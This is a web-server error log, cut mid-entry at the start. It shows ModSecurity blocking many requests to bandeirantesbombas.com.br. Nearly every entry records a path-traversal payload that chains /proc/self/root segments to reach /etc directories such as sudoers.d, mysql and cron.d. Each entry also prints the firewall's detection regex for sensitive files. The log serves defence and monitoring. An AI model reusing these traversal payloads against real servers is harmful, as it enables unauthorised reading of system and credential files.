"WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhf46QpVkWug9HeOt9KGwAAA0E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:54:14.243639 2026] [:error] [pid 10831:tid 140411733534464] [client 74.7.243.203:52900] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhf5o6lpbStxTqkSkt_PgAAAkE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:54:14.355092 2026] [:error] [pid 21806:tid 140411733534464] [client 74.7.241.46:41848] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhf5tSswJuvopo3lOhzvwAAAIE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:54:16.839060 2026] [:error] [pid 29507:tid 140411590858496] [client 74.7.243.203:52902] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhf6Er9dMAiw-8KANNb2wAAARI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:54:18.832692 2026] [:error] [pid 21806:tid 140411725141760] [client 74.7.241.46:39206] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhf6tSswJuvopo3lOhzxQAAAII"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:54:19.261829 2026] [:error] [pid 29802:tid 140411683178240] [client 74.7.243.203:52906] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhf68_BxrYCr4hPDw_-nQAAAcc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:54:20.604780 2026] [:error] [pid 15568:tid 140411582465792] [client 74.7.243.203:46950] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhf7KQpVkWug9HeOt9KHAAAA1M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:54:21.279162 2026] [:error] [pid 29507:tid 140411658000128] [client 74.7.241.46:33700] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhf7Ur9dMAiw-8KANNb4AAAAQo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:54:22.679559 2026] [:error] [pid 29507:tid 140411574073088] [client 74.7.241.46:33704] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhf7kr9dMAiw-8KANNb4gAAARQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:54:22.956492 2026] [:error] [pid 10651:tid 140411641214720] [client 74.7.243.203:46956] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhf7rysWC90G-1nBrBYSgAAAYw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:54:25.280904 2026] [:error] [pid 29507:tid 140411683178240] [client 74.7.243.203:46962] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhf8Ur9dMAiw-8KANNb5wAAAQc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:54:28.522664 2026] [:error] [pid 14895:tid 140411708356352] [client 74.7.241.46:33714] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhf9FajLEzk2WiQ-10nmAAAAoQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:54:32.136610 2026] [:error] [pid 29802:tid 140411741927168] [client 74.7.241.46:45094] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhf-M_BxrYCr4hPDw_-owAAAcA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:54:46.290461 2026] [:error] [pid 10831:tid 140411725141760] [client 74.7.244.31:57008] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abhgBo6lpbStxTqkSkt_RgAAAkI"]
[Mon Mar 16 16:55:03.411459 2026] [:error] [pid 14895:tid 140411691570944] [client 74.7.241.46:45096] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhgF1ajLEzk2WiQ-10nuQAAAoY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:55:06.042211 2026] [:error] [pid 14895:tid 140411632822016] [client 74.7.241.46:44902] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhgGlajLEzk2WiQ-10nvQAAAo0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:55:09.635429 2026] [:error] [pid 29507:tid 140411616036608] [client 74.7.241.46:44910] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhgHUr9dMAiw-8KANNcBAAAAQ8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:56:00.200427 2026] [:error] [pid 21806:tid 140411607643904] [client 74.7.243.203:46974] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhgUNSswJuvopo3lOh0IgAAAJA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:56:01.511322 2026] [:error] [pid 21806:tid 140411548894976] [client 74.7.243.203:41092] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhgUdSswJuvopo3lOh0JAAAAJc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:56:02.762999 2026] [:error] [pid 29507:tid 140411565680384] [client 74.7.243.203:41098] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhgUkr9dMAiw-8KANNcNQAAARU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:56:04.211134 2026] [:error] [pid 29507:tid 140411641214720] [client 74.7.243.203:41104] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhgVEr9dMAiw-8KANNcNwAAAQw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:56:05.414127 2026] [:error] [pid 29802:tid 140411741927168] [client 74.7.243.203:41116] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhgVc_BxrYCr4hPDw_-rQAAAcA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:56:06.545431 2026] [:error] [pid 14895:tid 140411683178240] [client 74.7.243.203:41128] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhgVlajLEzk2WiQ-10nzwAAAoc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
